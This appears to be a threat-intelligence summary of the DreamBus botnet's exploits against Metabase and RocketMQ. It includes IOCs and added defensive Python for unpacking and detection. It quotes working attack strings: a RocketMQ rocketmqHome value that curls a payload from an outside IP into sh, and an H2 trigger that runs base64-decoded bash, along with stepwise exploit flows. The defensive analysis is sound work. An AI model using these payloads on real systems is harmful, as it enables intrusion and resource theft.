DreamBus Unleashes Metabase Mayhem With New Exploit Module

Zscaler ThreatLabz details technical procedures used by the DreamBus Linux botnet to exploit Metabase (CVE-2023-38646) and Apache RocketMQ (CVE-2023-33246), with modules that scan networks, stage payloads, and execute shell scripts to fetch the main malware and deploy an XMRig Monero miner. The report describes UPX-packed ELF modules with modified headers, scanning of RFC1918 and public ranges, staged JSON and binary payloads for remote command execution, and C2 delivery via onion/tor2web. #DreamBus #Metabase

Keypoints

  • DreamBus is a modular Linux botnet that scans internal RFC1918 ranges and public IP space to find vulnerable services and deploy exploit modules.
  • Recent modules target Metabase (CVE-2023-38646) and Apache RocketMQ (CVE-2023-33246) to achieve remote command execution and stage payloads.
  • Modules are ELF binaries packed with UPX whose magic bytes are modified (e.g., replaced with “.gnu”) to hinder static UPX unpacking.
  • Exploit flow for Metabase: probe port 3000, detect Metabase via response string, write a staged JSON to /tmp/.json[ip], extract setup token with curl+grep, replace placeholder, POST to /api/setup/validate, then run a shell script to download and execute the main module.
  • Exploit flow for RocketMQ: send a crafted remoting packet to the broker port 10911 that invokes the unauthenticated update-broker-configuration request (code 25) and sets rocketmqHome to a shell command; the broker later splices that value into a shell command line, which downloads a script (reketed) that in turn fetches and runs the main module.
  • Post-exploitation behavior includes creating a module lock file (/tmp/.systemd.3), fetching payloads via DoH/tor/tor2web, and deploying XMRig to mine Monero.

MITRE Techniques

  • [T1046] Network Service Discovery – Scans internal RFC1918 ranges and public IPs looking for services and specific ports (e.g., 3000 for Metabase, 10911 for RocketMQ) (‘…scans internal RFC 1918 ranges 172.16.0.0/12, 192.168.0.0/16, and 10.0.0.0/8 as well as randomly scanning public IP ranges.’).
  • [T1190] Exploit Public-Facing Application – Uses public CVE exploits to gain RCE on Metabase and RocketMQ (‘…Metabase…vulnerable to CVE-2023-38646…’ and ‘…a vulnerability cataloged as CVE-2023-33246…’).
  • [T1110] Brute Force – Attempts credential guessing against Redis, PostgreSQL, and SSH using bundled password lists (‘…Links to the current password lists used by DreamBus to brute force Redis, PostgreSQL, and SSH credentials are provided…’).
  • [T1059] Command and Scripting Interpreter – Executes shell scripts on successful exploitation to download and run the main DreamBus module and miner (‘…executes shell scripts that download the main DreamBus module…’).
  • [T1027] Obfuscated Files or Information – Modifies UPX-packed ELF headers to prevent standard UPX static unpacking (‘…the UPX magic bytes have been replaced with the value .gnu (0x756e672e).’).
  • [T1090] Proxy (C2 via Tor/onion) – Uses .onion and tor2web endpoints to retrieve payloads and C2 communications (‘…ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion’ and references to ‘tor2web’).
  • [T1496] Resource Hijacking – Deploys XMRig to mine Monero on compromised hosts (‘…monetized by mining Monero cryptocurrency using XMRig.’).

Indicators of Compromise

  • [SHA256 Hashes] sample modules – 9f49375ae05c16d80e02c21f178429602f726ce87295b9dfd9458f37956392e3 (Metabase module), b86fa919ab9ebaa3f8ead4f7ef6ee0bb94a3a1b7d9583e99598893f2738a1c71 (RocketMQ module), and 6 more sample hashes.
  • [Domains/IPs] network C2 and mining – ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion (C2), 92.204.243[.]155 (C2 hosting payloads), and 2 more network indicators including 139.59.150[.]7 and p2pool[.]it.
  • [Filenames] host artifacts – /tmp/.systemd.3 (DreamBus module lock file), /tmp/.json[ipaddress] (staged Metabase exploit payload file).
  • [Password lists] brute-force targets – SSH password list and combined PostgreSQL/Redis password list used by DreamBus to attempt credential guesses.

DreamBus exploit modules are UPX-packed ELF binaries whose UPX magic bytes have been overwritten (most recently with ".gnu") so that a stock upx -d refuses the file and static unpacking fails until the magic is restored. Each module scans both internal RFC1918 ranges (172.16.0.0/12, 192.168.0.0/16, 10.0.0.0/8) and random public IPs for services on specific ports, creates a lock file (/tmp/.systemd.3) to enforce a single running instance, and contains exploit-specific code that, on success, writes staged payloads to /tmp and executes shell scripts which fetch the main DreamBus module and the XMRig miner.
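Restoring the magic is the first step an analyst takes before unpacking. The following is an added example, not code from the Zscaler report or from DreamBus: it parses the ELF64 header to locate where UPX keeps its l_info block (assumed, as is usual for UPX, to sit immediately after the program header table, with the magic four bytes into the block) and its PackHeader trailer (assumed to lie in the last 64 bytes of the file), restores "UPX!" at those two positions, and only reports, without touching, any other ".gnu" hit so that legitimate data such as a ".gnu.hash" string is not corrupted. The sample file it builds is constructed; the offsets, window size and the version/format bytes in it are assumptions.

```python
"""Restore the UPX magic in an ELF whose "UPX!" bytes were overwritten.

Added example for this page, not code from the Zscaler report or from DreamBus.
DreamBus modules carry ".gnu" (0x756e672e little-endian) where UPX expects
"UPX!". Assumed layout (labelled): the l_info block follows the program header
table and the PackHeader trailer sits inside the last TAIL_WINDOW bytes.
"""
import struct

UPX_MAGIC = b"UPX!"
FAKE_MAGIC = b".gnu"   # the substitute value described on this page
TAIL_WINDOW = 64       # assumption: PackHeader trailer lives in the last 64 bytes


def elf64_phdr_end(data: bytes) -> int:
    """Return the file offset just past the ELF64 program header table."""
    if data[:4] != b"\x7fELF" or data[4] != 2:   # EI_CLASS 2 == ELFCLASS64
        raise ValueError("not an ELF64 file")
    e_phoff = struct.unpack_from("<Q", data, 0x20)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    return e_phoff + e_phentsize * e_phnum


def find_magic(data: bytes, magic: bytes) -> list[int]:
    """All offsets at which `magic` occurs."""
    hits, pos = [], data.find(magic)
    while pos != -1:
        hits.append(pos)
        pos = data.find(magic, pos + 1)
    return hits


def restore_upx_magic(data: bytes, fake: bytes = FAKE_MAGIC) -> tuple[bytes, dict]:
    """Put "UPX!" back at the structural positions; report everything else.

    Returns (patched_bytes, report): report["restored"] lists offsets patched,
    report["ignored"] lists offsets of `fake` that do not sit at a UPX header
    position and are therefore left alone.
    """
    buf = bytearray(data)
    l_info_off = elf64_phdr_end(data)
    restored, ignored = [], []
    for off in find_magic(data, fake):
        # l_info is {l_checksum u32, l_magic u32, l_lsize u16, l_version u8, l_format u8}
        at_l_info = off == l_info_off + 4
        in_tail = off >= len(data) - TAIL_WINDOW
        if at_l_info or in_tail:
            buf[off:off + 4] = UPX_MAGIC
            restored.append(off)
        else:
            ignored.append(off)
    return bytes(buf), {"restored": restored, "ignored": ignored}


def build_sample() -> bytes:
    """Constructed stand-in for a DreamBus module: ELF64 header, two program
    headers, an l_info block and a PackHeader trailer (both carrying ".gnu"),
    and a decoy ".gnu" in the stub area that must not be touched."""
    ehdr = bytearray(64)
    ehdr[:4] = b"\x7fELF"
    ehdr[4] = 2                                   # ELFCLASS64
    struct.pack_into("<Q", ehdr, 0x20, 64)        # e_phoff: phdrs follow the header
    struct.pack_into("<HH", ehdr, 0x36, 56, 2)    # e_phentsize, e_phnum
    phdrs = bytes(56 * 2)
    # checksum, magic, lsize, version, format (version/format values are placeholders)
    l_info = struct.pack("<I4sHBB", 0, FAKE_MAGIC, 12, 13, 22)
    stub = b"\x00" * 40 + b"section .gnu.hash decoy" + b"\x00" * 40
    trailer = FAKE_MAGIC + bytes(28)              # 32-byte PackHeader stand-in
    return bytes(ehdr) + phdrs + l_info + stub + trailer


if __name__ == "__main__":
    patched, report = restore_upx_magic(build_sample())
    print(report)   # the real workflow then runs: upx -d restored.bin
```

On a real sample, write the patched bytes to a new file and run upx -d on it; if UPX still rejects the file, the report's "ignored" list shows where else the substitute value occurs and the two assumed positions should be checked against the stub by hand.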

For Metabase (CVE-2023-38646) the module probes port 3000 with GET /api/session/properties and looks for the string "metabase.D" in the response to confirm a Metabase instance. It then writes a staged JSON to /tmp/.json[ip] containing a "token": "setup-token" placeholder and database details whose H2 connection string carries an init clause that creates a trigger; the trigger body is Java code that executes a base64-decoded bash payload. The module extracts the real setup token from the same /api/session/properties response using curl and a grep regex, patches the staged JSON with sed (sed -i "s/setup-token/$setup_token/g"), POSTs it to /api/setup/validate, removes the staged file, and on success runs a downloaded shell script that uses DoH and tor/tor2web endpoints to retrieve and execute the main ELF payload. The setup token is meant to be usable only during first-time setup; vulnerable Metabase versions keep exposing it after setup has completed, which is what makes the whole sequence pre-authentication.
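The sequence above (fingerprint via /api/session/properties, then a POST to /api/setup/validate whose H2 connection string carries a trigger) is also what a defender can look for. The following is an added example, not code from the Zscaler report or from DreamBus: it runs over already-parsed HTTP requests (the record shape with src, method, path and body is an assumption; the body is only available where a reverse proxy or WAF records it), alerts on validate requests whose body carries the H2 trigger / Java execution markers, and raises the severity when the same source probed the properties endpoint first. A bare probe-then-validate pair is deliberately not an alert, because a legitimate first-time setup issues the same two requests. The sample traffic and the base64 blob in it are constructed.

```python
"""Flag the Metabase CVE-2023-38646 exploit flow in parsed HTTP requests.

Added example for this page, not code from the Zscaler report or from DreamBus.
Request records are dicts with src, method, path and body (assumed shape);
the sample traffic below is constructed.
"""
import re

PROBE_PATH = "/api/session/properties"   # fingerprint + setup-token source
SETUP_PATH = "/api/setup/validate"       # the patched staged JSON is POSTed here

# Markers of the H2 connection-string abuse that turns /api/setup/validate into RCE.
RCE_MARKERS = {
    "h2-trigger": re.compile(r"CREATE\s+TRIGGER", re.I),
    "h2-init": re.compile(r"\bINIT=", re.I),
    "java-exec": re.compile(r"java\.lang\.Runtime|getRuntime\(\)\.exec"),
    "b64-bash": re.compile(r"base64,?\s*-d"),
}


def body_markers(body: str) -> list[str]:
    """Names of the RCE markers present in a request body."""
    return [name for name, rx in RCE_MARKERS.items() if rx.search(body)]


def detect(requests: list[dict]) -> list[dict]:
    """One alert per POST /api/setup/validate whose body carries RCE markers.

    Severity is "high" when the same source fetched /api/session/properties
    earlier (the exploit sequence on this page), otherwise "medium".
    """
    probed: set[str] = set()
    alerts = []
    for r in requests:
        if r["method"] == "GET" and r["path"] == PROBE_PATH:
            probed.add(r["src"])
        elif r["method"] == "POST" and r["path"] == SETUP_PATH:
            markers = body_markers(r.get("body", ""))
            if markers:
                alerts.append({
                    "src": r["src"],
                    "markers": markers,
                    "severity": "high" if r["src"] in probed else "medium",
                })
    return alerts


def sample_requests() -> list[dict]:
    """Constructed traffic: an attacker following the DreamBus flow, an admin
    doing a normal first-time setup with PostgreSQL, and a second attacker
    that skipped the probe. The base64 blob is a placeholder."""
    evil_body = (
        '{"token":"0f5e7e4b-REPLACED","details":{"engine":"h2","details":{"db":'
        '"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;'
        'INIT=CREATE TRIGGER x BEFORE SELECT ON INFORMATION_SCHEMA.TABLES '
        'AS $$//javascript\\njava.lang.Runtime.getRuntime().exec('
        "'bash -c {echo,ZWNobyBoaQ==}|{base64,-d}|{bash,-i}')\\n$$--=x\"}}}"
    )
    admin_body = ('{"token":"0f5e7e4b-REPLACED","details":{"engine":"postgres","details":'
                  '{"host":"db.internal","port":5432,"dbname":"metabase","user":"mb"}}}')
    return [
        {"src": "203.0.113.7", "method": "GET", "path": PROBE_PATH, "body": ""},
        {"src": "203.0.113.7", "method": "POST", "path": SETUP_PATH, "body": evil_body},
        {"src": "198.51.100.5", "method": "GET", "path": PROBE_PATH, "body": ""},
        {"src": "198.51.100.5", "method": "POST", "path": SETUP_PATH, "body": admin_body},
        {"src": "203.0.113.9", "method": "POST", "path": SETUP_PATH, "body": evil_body},
    ]


if __name__ == "__main__":
    for alert in detect(sample_requests()):
        print(alert)
```

Where request bodies are not logged, the only remaining signal is the path itself: on an instance that has already completed setup, any POST to /api/setup/validate is worth an alert on its own.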

The RocketMQ module targets port 10911 by sending a crafted binary packet that invokes the broker configuration update (code 25) without authentication and sets rocketmqHome to a shell command such as '-c $@|sh . echo curl -fsSkLA- 92.204.243.155:8080/roket -o reketed;'. The injection works because the broker's filter-server launcher builds the command line 'sh' + rocketmqHome + '/bin/startfsrv.sh …' and splits it on spaces, so the argument vector becomes sh, -c, $@|sh, ., echo, curl, …, reketed;/bin/startfsrv.sh, …; the inline script $@|sh echoes its remaining positional parameters (the curl command) into a second shell, which downloads the 'reketed' script. That script follows the same retrieval pattern (curl/DoH/tor2web), writes a temporary executable, and launches the DreamBus main module and miner. Detection should focus on the listed hashes, the C2 endpoints (the .onion address and IPs such as 92.204.243.155), the /tmp/.json[ip] staged files and the lock file /tmp/.systemd.3, plus the network side of each exploit: POSTs to /api/setup/validate on a Metabase instance that has already completed setup, and code-25 configuration updates reaching a broker on 10911 that set rocketmqHome to anything other than a plain filesystem path.
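The crafted packet above is an ordinary RocketMQ remoting frame, which makes it easy to inspect from a capture. The following is an added example, not code from the Zscaler report or from DreamBus: it encodes and decodes the frame format (4-byte big-endian total length, then 4 bytes whose high byte is the serialization type, 0 for JSON, and whose low three bytes are the header length, then the JSON header, then the body), parses the Java-Properties style body of an UPDATE_BROKER_CONFIG request, and flags a rocketmqHome value that contains shell metacharacters. The three sample frames are constructed; the command in the first one is the one quoted on this page. The header field names and the request codes 25 and 26 are RocketMQ's own; the version number in the sample header is a placeholder.

```python
"""Decode RocketMQ remoting frames and flag the CVE-2023-33246 abuse pattern.

Added example for this page, not code from the Zscaler report or from DreamBus.
Frame: u32 total length (excludes itself) | u32 (serialize type << 24 | header
length) | JSON header | body. For UPDATE_BROKER_CONFIG the body is "key=value"
lines. The sample frames are constructed.
"""
import json
import re
import struct

UPDATE_BROKER_CONFIG = 25      # the request code the exploit invokes (page: "code 25")
GET_BROKER_CONFIG = 26
SHELL_META = re.compile(r"[|;&$`<>]")


def encode_frame(header: dict, body: bytes = b"") -> bytes:
    """Build a JSON-serialized remoting frame (used here to construct samples)."""
    hdr = json.dumps(header, separators=(",", ":")).encode()
    total = 4 + len(hdr) + len(body)
    # high byte of the second word is the serialization type: 0 == JSON
    return struct.pack(">II", total, len(hdr) & 0xFFFFFF) + hdr + body


def decode_frame(frame: bytes) -> tuple[dict, bytes]:
    """Split a frame into (header dict, body bytes); rejects truncated or non-JSON frames."""
    if len(frame) < 8:
        raise ValueError("frame too short")
    total, mark = struct.unpack_from(">II", frame, 0)
    ser_type, hdr_len = mark >> 24, mark & 0xFFFFFF
    if ser_type != 0:
        raise ValueError(f"unsupported serialization type {ser_type}")
    if len(frame) < 4 + total or hdr_len > total - 4:
        raise ValueError("truncated frame")
    header = json.loads(frame[8:8 + hdr_len])
    body = frame[8 + hdr_len:4 + total]
    return header, body


def parse_properties(body: bytes) -> dict:
    """Parse the key=value lines of a broker config update body."""
    props = {}
    for line in body.decode("utf-8", "replace").splitlines():
        if "=" in line:
            k, v = line.split("=", 1)
            props[k.strip()] = v.strip()
    return props


def inspect_frame(frame: bytes) -> dict:
    """Classify one frame: suspicious if it is an UPDATE_BROKER_CONFIG that sets
    rocketmqHome to a value containing shell metacharacters (the broker later
    runs sh <rocketmqHome>/bin/startfsrv.sh, so that is command injection)."""
    header, body = decode_frame(frame)
    code = header.get("code")
    props = parse_properties(body) if code == UPDATE_BROKER_CONFIG else {}
    home = props.get("rocketmqHome", "")
    return {
        "code": code,
        "rocketmqHome": home,
        "suspicious": code == UPDATE_BROKER_CONFIG and bool(SHELL_META.search(home)),
    }


def sample_frames() -> dict:
    """Constructed frames: the DreamBus-style injection, a benign config update,
    and a read-only config request."""
    base = {"code": 0, "flag": 0, "language": "JAVA", "opaque": 1,
            "serializeTypeCurrentRPC": "JSON", "version": 395, "extFields": {}}
    evil_body = (b"rocketmqHome=-c $@|sh . echo curl -fsSkLA- 92.204.243.155:8080/roket -o reketed;\n"
                 b"filterServerNums=1\n")
    benign_body = b"rocketmqHome=/opt/rocketmq\nfilterServerNums=0\n"
    return {
        "dreambus": encode_frame(dict(base, code=UPDATE_BROKER_CONFIG), evil_body),
        "benign": encode_frame(dict(base, code=UPDATE_BROKER_CONFIG), benign_body),
        "readonly": encode_frame(dict(base, code=GET_BROKER_CONFIG)),
    }


if __name__ == "__main__":
    for name, frame in sample_frames().items():
        print(name, inspect_frame(frame))
```

To use it on traffic, feed it the TCP payloads of sessions to port 10911 one frame at a time; a code-25 update from any address that is not an administrative host is already unusual, and one whose rocketmqHome is not a plain path is the exploit.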

Read more: https://www.zscaler.com/blogs/security-research/dreambus-unleashes-metabase-mayhem-new-exploit-module